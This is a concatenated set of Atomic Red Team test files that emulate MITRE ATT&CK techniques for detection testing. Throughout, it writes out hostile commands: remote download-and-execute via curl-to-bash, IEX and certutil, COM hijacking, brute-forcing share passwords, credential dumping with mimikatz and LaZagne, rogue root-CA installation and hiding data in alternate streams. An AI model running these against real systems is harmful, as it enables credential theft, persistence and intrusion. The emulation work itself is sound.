14 | "ThreadingModel"="Apartment"
15 | [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
16 | @="AtomicRedTeam.1.00"
17 | [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
18 | @="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
19 | [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
20 | @="AtomicRedTeam"
21 | [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
22 | [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
23 | @="{00000001-0000-0000-0000-0000FEEDACDC}"
24 |
--------------------------------------------------------------------------------
/tests/T1176/T1176.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1176
3 | display_name: Browser Extensions
4 |
5 | atomic_tests:
6 | - name: Chrome (Developer Mode)
7 | description: |
8 | xxx
9 | supported_platforms:
10 | - linux
11 | - windows
12 | - macos
13 | executor:
14 | name: manual
15 | steps: |
16 | 1. Navigate to [chrome://extensions](chrome://extensions) and
17 | tick 'Developer Mode'.
18 |
19 | 2. Click 'Load unpacked extension...' and navigate to
20 | [Browser_Extension](../t1176/)
21 |
22 | 3. Click 'Select'
23 |
24 | - name: Chrome (Chrome Web Store)
25 | description: |
26 | xxx
27 | supported_platforms:
28 | - linux
29 | - windows
30 | - macos
31 | executor:
32 | name: manual
33 | steps: |
34 | 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
35 | in Chrome
36 |
37 | 2. Click 'Add to Chrome'
38 |
39 | - name: Firefox
40 | description: |
41 | Create a file called test.wma, with the duration of 30 seconds
42 | supported_platforms:
43 | - linux
44 | - windows
45 | - macos
46 | executor:
47 | name: manual
48 | steps: |
49 | 1. Navigate to [about:debugging](about:debugging) and
50 | click "Load Temporary Add-on"
51 |
52 | 2. Navigate to [manifest.json](./manifest.json)
53 |
54 | 3. Then click 'Open'
55 |
--------------------------------------------------------------------------------
/tests/T1130/T1130.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1130
3 | display_name: Install Root Certificate
4 |
5 | atomic_tests:
6 | - name: Install root CA on CentOS/RHEL
7 | description: |
8 | Creates a root CA with openssl
9 | supported_platforms:
10 | - linux
11 | input_arguments:
12 | key_filename:
13 | description: Key we create that is used to create the CA certificate
14 | type: Path
15 | default: rootCA.key
16 | cert_filename:
17 | description: Path of the CA certificate we create
18 | type: Path
19 | default: rootCA.crt
20 | executor:
21 | name: sh
22 | command: |
23 | openssl genrsa -out #{key_filename} 4096
24 | openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
25 |
26 | if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
27 | then
28 | cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
29 | else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
30 | cp rootCA.crt /etc/pki/ca-trust/source/anchors/
31 | update-ca-trust
32 | fi
33 |
34 | # TODO: there was some note about testing like this:
35 |
36 | # # Testing the trusted certificate.
37 | # To test the new trust, apply the root certificate or another signed with it to
38 | # a SSL/TLS web service and attempt a connection with curl or wget.
39 | #
40 | # curl https://art.evil.com
41 |
--------------------------------------------------------------------------------
/tests/T1201/T1201.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1201
3 | display_name: Password Policy Discovery
4 |
5 | atomic_tests:
6 | - name: Examine password complexity policy - Ubuntu
7 | description: |
8 | Lists the password complexity policy to console on Ubuntu Linux.
9 |
10 | supported_platforms:
11 | - ubuntu
12 |
13 | executor:
14 | name: bash
15 | command: |
16 | cat /etc/pam.d/common-password
17 |
18 | - name: Examine password complexity policy - CentOS/RHEL 7.x
19 | description: |
20 | Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
21 |
22 | supported_platforms:
23 | - centos
24 |
25 | executor:
26 | name: bash
27 | command: |
28 | cat /etc/security/pwquality.conf
29 |
30 | - name: Examine password complexity policy - CentOS/RHEL 6.x
31 | description: |
32 | Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
33 |
34 | supported_platforms:
35 | - centos
36 |
37 | executor:
38 | name: bash
39 | command: |
40 | cat /etc/pam.d/system-auth
41 |
42 | cat /etc/security/pwquality.conf
43 |
44 | - name: Examine password expiration policy - All Linux
45 | description: |
46 | Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
47 |
48 | supported_platforms:
49 | - linux
50 |
51 | executor:
52 | name: bash
53 | command: |
54 | cat /etc/login.defs
55 |
--------------------------------------------------------------------------------
/tests/T1081/T1081.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1081
3 | display_name: Credentials in Files
4 |
5 | atomic_tests:
6 | - name: Browser and System credentials
7 | description: |
8 | [LaZagne Source](https://github.com/AlessandroZ/LaZagne)
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: sh
15 | command: |
16 | python2 laZagne.py all
17 |
18 | - name: Extract credentials from files
19 | description: |
20 | Extracting credentials from files
21 | input_arguments:
22 | file_path:
23 | description: Path to search
24 | type: String
25 | default: /
26 | supported_platforms:
27 | - macos
28 | - linux
29 | executor:
30 | name: sh
31 | command: |
32 | grep -riP password #{file_path}
33 |
34 | - name: Mimikatz & Kittenz
35 | description: |
36 | Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
37 | supported_platforms:
38 | - windows
39 | executor:
40 | name: powershell
41 | command: |
42 | invoke-mimikittenz
43 | mimikatz.exe
44 |
45 | - name: Extracting credentials from files
46 | description: |
47 | Extracting Credentials from Files
48 | supported_platforms:
49 | - windows
50 | executor:
51 | name: powershell
52 | command: |
53 | findstr /si pass *.xml | *.doc | *.txt | *.xls
54 | ls -R | select-string -Pattern password
55 |
56 |
--------------------------------------------------------------------------------
/tests/T1035/T1035.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1035
3 | display_name: Service Execution
4 | tactic: Execution
5 | description: Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
6 |
7 | atomic_tests:
8 | - name: Execute a Command as a Service
9 | description: |
10 | Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | service_name:
17 | description: Name of service to create
18 | type: string
19 | default: ARTService
20 |
21 | executable_command:
22 | description: Command to execute as a service
23 | type: string
24 | default: "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
25 |
26 | executor_cmd:
27 | name: command_prompt
28 | command: |
29 | sc.exe create #{service_name} binPath= #{executable_command}
30 | sc.exe start #{service_name}
31 | sc.exe delete #{service_name}
32 |
--------------------------------------------------------------------------------
/tests/T1197/T1197.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1197
3 | display_name: BITS Jobs
4 | tactic: Defense Evasion, Persistence
5 | description: Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. Adversaries may abuse BITS to download, execute, and even clean up after malicious code.
6 |
7 | atomic_tests:
8 | - name: Download & Execute
9 | description: |
10 | This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload
11 | This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor_cmd:
17 | name: command_prompt
18 | command: |
19 | bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1
20 |
21 | executor_pwr:
22 | name: powershell
23 | command: |
24 | Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
25 |
--------------------------------------------------------------------------------
/tests/T1002/T1002.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1002
3 | display_name: Data Compressed
4 | tactic: Exfiltration
5 | description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
6 |
7 | atomic_tests:
8 | - name: Compress Data for Exfiltration
9 | description: |
10 | Exfiltrate data
11 |
12 | supported_platforms:
13 | - windows
14 | - linux
15 |
16 | executor_pwr:
17 | name: powershell
18 | command: |
19 | dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
20 |
21 | executor_man:
22 | name: command_prompt
23 | command: |
24 | rar a -r #{output_file} #{input_file}
25 |
26 | executor_nix:
27 | name: sh
28 | command: |
29 | mkdir /tmp/victim-files
30 | cd /tmp/victim-files
31 | touch a b c d e f g
32 | echo "This file will be gzipped" > /tmp/victim-gzip.txt
33 | echo "This file will be tarred" > /tmp/victim-tar.txt
34 | zip /tmp/victim-files.zip /tmp/victim-files/*
35 | gzip -f /tmp/victim-gzip.txt
36 | tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
37 | tar -cvzf /tmp/victim-tar.tar.gz
38 |
--------------------------------------------------------------------------------
/tests/T1193/T1193.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1193
3 | display_name: Spearphishing Attachment
4 | tactic: Initial Access
5 | description: Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email.
6 |
7 | atomic_tests:
8 | - name: Download Phishing Attachment - VBScript
9 | description: |
10 | The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
11 | The below will successfully download the macro-enabled Excel file to the current location.
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor_man:
17 | name: powershell
18 | command: |
19 | if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
20 | return 'Please install Microsoft Excel before running this test.'
21 | }
22 | else{
23 | $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/PhishingAttachment.xlsm'
24 | $fileName = 'PhishingAttachment.xlsm'
25 | New-Item -Type File -Force -Path $fileName | out-null
26 | $wc = New-Object System.Net.WebClient
27 | $wc.Encoding = [System.Text.Encoding]::UTF8
28 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
29 | ($wc.DownloadString("$url")) | Out-File $fileName
30 | }
--------------------------------------------------------------------------------
/tests/T1114/T1114.md:
--------------------------------------------------------------------------------
1 | # T1114 - Email Collection
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114)
3 | Adversaries may target user email to collect sensitive information from a target.
4 |
5 | Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
6 |
7 | Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
8 |
9 | Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.
10 |
11 | ## Atomic Tests
12 |
13 | - [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)
14 |
15 |
16 |
17 |
18 | ## Atomic Test #1 - T1114 Email Collection with PowerShell
19 | Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
20 |
21 | **Supported Platforms:** Windows
22 |
23 |
24 | #### Run it with `command_prompt`!
25 | ```
26 | Display email contents in the terminal
27 | PS C:\> .\Get-Inbox.ps1
28 |
29 | Write emails out to a CSV
30 | PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
31 |
32 | Download and Execute
33 | "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"
34 | ```
35 |
--------------------------------------------------------------------------------
/tests/T1005/T1005.md:
--------------------------------------------------------------------------------
1 | # T1005 - Data from Local System
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005)
3 | Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
4 |
5 | Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
6 |
7 | ## Atomic Tests
8 |
9 | - [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies)
10 |
11 |
12 |
13 |
14 | ## Atomic Test #1 - Search macOS Safari Cookies
15 | This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
16 |
17 | **Supported Platforms:** macOS
18 |
19 |
20 | #### Inputs
21 | | Name | Description | Type | Default Value |
22 | |------|-------------|------|---------------|
23 | | search_string | String to search Safari cookies to find. | string | coinbase|
24 |
25 | #### Run it with `sh`!
26 | ```
27 | cd ~/Library/Cookies
28 | grep -q "#{search_string}" "Cookies.binarycookies"
29 | ```
30 |
--------------------------------------------------------------------------------
/tests/T1110/T1110.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1110
3 | display_name: Brute Force Credential Access
4 |
5 | atomic_tests:
6 | - name: Brute Force Credentials
7 | description: |
8 | Creates username and password files then attempts to brute force on remote host
9 | supported_platforms:
10 | - windows
11 | input_arguments:
12 | input_file_users:
13 | description: Path to a file containing a list of users that we will attempt to brute force
14 | type: Path
15 | default: DomainUsers.txt
16 | input_file_passwords:
17 | description: Path to a file containing a list of passwords we will attempt to brute force with
18 | type: Path
19 | default: passwords.txt
20 | remote_host:
21 | description: Hostname of the target system we will brute force upon
22 | type: String
23 | default: \\COMPANYDC1\IPC$
24 | domain:
25 | description: Domain name of the target system we will brute force upon
26 | type: String
27 | default: YOUR_COMPANY
28 | executor:
29 | name: command_prompt
30 | command: |
31 | net user /domain > #{input_file_users}
32 | echo "Password1" >> #{input_file_passwords}
33 | echo "1q2w3e4r" >> #{input_file_passwords}
34 | echo "Password!" >> #{input_file_passwords}
35 | @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
36 |
--------------------------------------------------------------------------------
/tests/T1126/T1126.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1126
3 | display_name: Remove Network Share
4 |
5 | atomic_tests:
6 | - name: Add Network Share
7 | description: |
8 | Add a Network Share utilizing the command_prompt
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | share_name:
15 | description: Share to add.
16 | type: string
17 | default: \\test\share
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | net use c: #{share_name}
23 | net share test=#{share_name} /REMARK:"test share" /CACHE:No
24 |
25 | - name: Remove Network Share
26 | description: |
27 | Removes a Network Share utilizing the command_prompt
28 |
29 | supported_platforms:
30 | - windows
31 |
32 | input_arguments:
33 | share_name:
34 | description: Share to remove.
35 | type: string
36 | default: \\test\share
37 |
38 | executor:
39 | name: command_prompt
40 | command: |
41 | net share #{share_name} /delete
42 |
43 | - name: Remove Network Share PowerShell
44 | description: |
45 | Removes a Network Share utilizing PowerShell
46 |
47 | supported_platforms:
48 | - windows
49 |
50 | input_arguments:
51 | share_name:
52 | description: Share to remove.
53 | type: string
54 | default: \\test\share
55 |
56 | executor:
57 | name: powershell
58 | command: |
59 | Remove-SmbShare -Name #{share_name}
60 | Remove-FileShare -Name #{share_name}
61 |
--------------------------------------------------------------------------------
/tests/T1145/T1145.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1145
3 | display_name: Private Keys
4 | mitigation: Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of Valid Accounts.
5 | detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.
6 |
7 | atomic_tests:
8 | - name: Private Keys
9 | description: |
10 | Find private keys on the Windows file system.
11 |
12 | File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc
13 |
14 | supported_platforms:
15 | - windows
16 |
17 | executor:
18 | name: command_prompt
19 | command: |
20 | echo "ATOMICREDTEAM" > %windir%\cert.key
21 | dir c:\ /b /s .key | findstr /e .key
22 |
--------------------------------------------------------------------------------
/tests/T1059/T1059.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1059
3 | display_name: Command-Line Interface
4 | tactic: Execution
5 | description: Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.1 One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task).
6 |
7 | atomic_tests:
8 | - name: Command-Line Interface
9 | description: |
10 | Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
11 | This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.
12 |
13 | supported_platforms:
14 | - macos
15 | - centos
16 | - ubuntu
17 | - linux
18 |
19 | executor_nix:
20 | name: sh
21 | command: |
22 | bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
23 | bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
24 |
--------------------------------------------------------------------------------
/tests/T1096/T1096.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1096
3 | display_name: NTFS File Attributes
4 |
5 | atomic_tests:
6 | - name: Alternate Data Streams (ADS)
7 | description: |
8 | Execute from Alternate Streams
9 |
10 | [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)
11 |
12 | [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)
13 |
14 | supported_platforms:
15 | - windows
16 |
17 | input_arguments:
18 | path:
19 | description: Path of ADS file
20 | type: path
21 | default: c:\ADS\
22 |
23 | executor:
24 | name: command_prompt
25 | command: |
26 | type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
27 | extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
28 | findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
29 | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
30 | makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
31 | print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
32 | reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
33 | regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
34 | expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
35 | esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
36 |
--------------------------------------------------------------------------------
/tests/T1179/src/T1179.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27703.2018
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "T1179", "T1179\T1179.vcxproj", "{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x64.ActiveCfg = Debug|x64
17 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x64.Build.0 = Debug|x64
18 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x86.ActiveCfg = Debug|Win32
19 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x86.Build.0 = Debug|Win32
20 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x64.ActiveCfg = Release|x64
21 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x64.Build.0 = Release|x64
22 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x86.ActiveCfg = Release|Win32
23 | {8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {12B5822E-38ED-42F2-B03F-20C2F9983559}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/tests/T1009/T1009.md:
--------------------------------------------------------------------------------
1 | # T1009 - Binary Padding
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
3 | Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.
4 |
5 | Detection: Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.
6 |
7 | When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.
8 |
9 | Platforms: Linux, macOS, Windows
10 |
11 | Defense Bypassed: Anti-virus, Signature-based detection
12 |
13 | ## Atomic Tests
14 |
15 | - [Atomic Test #1 - Pad Evil Binary to Change Hash](#atomic-test-1---pad-evil-binary-to-change-hash)
16 |
17 |
18 |
19 |
20 | ## Atomic Test #1 - Pad Evil Binary to Change Hash
21 | Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution
22 |
23 | **Supported Platforms:** macOS, Linux
24 |
25 |
26 | #### Run it with `sh`!
27 | ```
28 | cp /bin/cat /tmp/evilCat
29 | md5sum /tmp/evilCat
30 | dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
31 | md5sum /tmp/evilCat
32 | /tmp/evilCat .bash_profile
33 | ```
34 |
35 |
--------------------------------------------------------------------------------
/tests/T1077/T1077.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1077
3 | display_name: Windows Admin Shares
4 |
5 | atomic_tests:
6 | - name: Map admin share
7 | description: |
8 | Connecting To Remote Shares
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | share_name:
15 | description: Examples C$, IPC$, Admin$
16 | type: String
17 | default: C$
18 | user_name:
19 | description: Username
20 | type: String
21 | default: DOMAIN\Administrator
22 | password:
23 | description: Password
24 | type: String
25 | default: P@ssw0rd1
26 | computer_name:
27 | description: Target Computer Name
28 | type: String
29 | default: Target
30 | executor:
31 | name: command_prompt
32 | command: |
33 | cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
34 |
35 | - name: Map Admin Share PowerShell
36 | description: |
37 | Map Admin share utilizing PowerShell
38 | supported_platforms:
39 | - windows
40 | input_arguments:
41 | share_name:
42 | description: Examples C$, IPC$, Admin$
43 | type: String
44 | default: C$
45 | computer_name:
46 | description: Target Computer Name
47 | type: String
48 | default: Target
49 | map_name:
50 | description: Mapped Drive Letter
51 | type: String
52 | default: g
53 | executor:
54 | name: powershell
55 | command: |
56 | New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
57 |
--------------------------------------------------------------------------------
/tests/T1169/T1169.md:
--------------------------------------------------------------------------------
1 | # T1169 - Sudo
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1169)
3 | The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware).
4 |
5 | Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.
6 |
7 | Detection: On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
8 |
9 | Platforms: Linux, macOS
10 |
11 | Data Sources: File monitoring
12 |
13 | Effective Permissions: root
14 |
15 | Permissions Required: User
16 |
17 | ## Atomic Tests
18 |
19 | - [Atomic Test #1 - Sudo usage](#atomic-test-1---sudo-usage)
20 |
21 |
22 |
23 |
24 | ## Atomic Test #1 - Sudo usage
25 | Common Sudo enumeration methods.
26 |
27 | **Supported Platforms:** macOS, Linux
28 |
29 |
30 | #### Run it with `sh`!
31 | ```
32 | sudo -l
33 | sudo su
34 | cat /etc/sudoers
35 | vim /etc/sudoers
36 | ```
37 |
38 |
--------------------------------------------------------------------------------
/tests/T1063/T1063.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1063
3 | display_name: Security Software Discovery
4 | tactic: Discovery
5 | description: Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
6 |
7 | atomic_tests:
8 | - name: Enumerate security software
9 | description: |
10 | Methods to identify Security Software on an endpoint
11 | Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed)
12 | Security Software Discovery - powershell
13 | Security Software Discovery - ps
14 |
15 | supported_platforms:
16 | - windows
17 | - linux
18 | - macos
19 |
20 | executor_cmd:
21 | name: command_prompt
22 | command: |
23 | netsh.exe advfirewall firewall show all profiles
24 | tasklist.exe
25 | tasklist.exe | findstr /i virus
26 | tasklist.exe | findstr /i cb
27 | tasklist.exe | findstr /i defender
28 | fltmc.exe | findstr.exe 385201
29 |
30 | executor_pwr:
31 | name: powershell
32 | command: |
33 | get-process | ?{$_.Description -like "*virus*"}
34 | get-process | ?{$_.Description -like "*carbonblack*"}
35 | get-process | ?{$_.Description -like "*defender*"}
36 |
37 | executor_nix:
38 | name: sh
39 | command: |
40 | ps -ef | grep Little\ Snitch | grep -v grep
41 | ps aux | grep CbOsxSensorService
--------------------------------------------------------------------------------
/tests/T1087/T1087.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1087
3 | display_name: Account Discovery
4 | tactic: Discovery
5 | description: Adversaries may attempt to get a listing of local system or domain accounts. Windows commands that can acquire this information are net user, net group , and net localgroup using the Net utility or through use of dsquery.
6 |
7 | atomic_tests:
8 | - name: Enumerate user/group accounts
9 | description: |
10 | List all accounts cmd, Powershell, Nix
11 |
12 | supported_platforms:
13 | - windows
14 | - linux
15 | - macos
16 |
17 | executor_cmd:
18 | name: command_prompt
19 | command: |
20 | net user
21 | cmd /r dir c:\Users\
22 | cmdkey.exe /list
23 | net localgroup "Users"
24 | net localgroup
25 |
26 | executor_pwr:
27 | name: powershell
28 | command: |
29 | get-localuser
30 | get-localgroupmember -group Users
31 | ls C:/Users
32 | get-childitem C:\Users\
33 | get-localgroup
34 | get-wmiobject -Class Win32_Computersystem | select Username
35 |
36 | executor_nix:
37 | name: nix
38 | command: |
39 | cat /etc/passwd > #{output_file}
40 | cat /etc/sudoers > #{output_file}
41 | grep 'x:0:' /etc/passwd > #{output_file}
42 | username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
43 | lastlog > #{output_file}
44 | groups
45 | id
46 | dscl . list /Groups
47 | dscl . list /Users
48 | dscl . list /Users | grep -v '_'
49 | dscacheutil -q group
50 | dscacheutil -q user
--------------------------------------------------------------------------------
/tests/T1183/T1183.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1183
3 | display_name: Image File Execution Options
4 |
5 | atomic_tests:
6 | - name: IFEO Add Debugger
7 | description: |
8 | TODO
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | target_binary:
14 | description: Binary To Attach To
15 | type: Path
16 | default: winword.exe
17 | payload_binary:
18 | description: Binary To Execute
19 | type: Path
20 | default: cmd.exe
21 |
22 | executor:
23 | name: command_prompt
24 | command: |
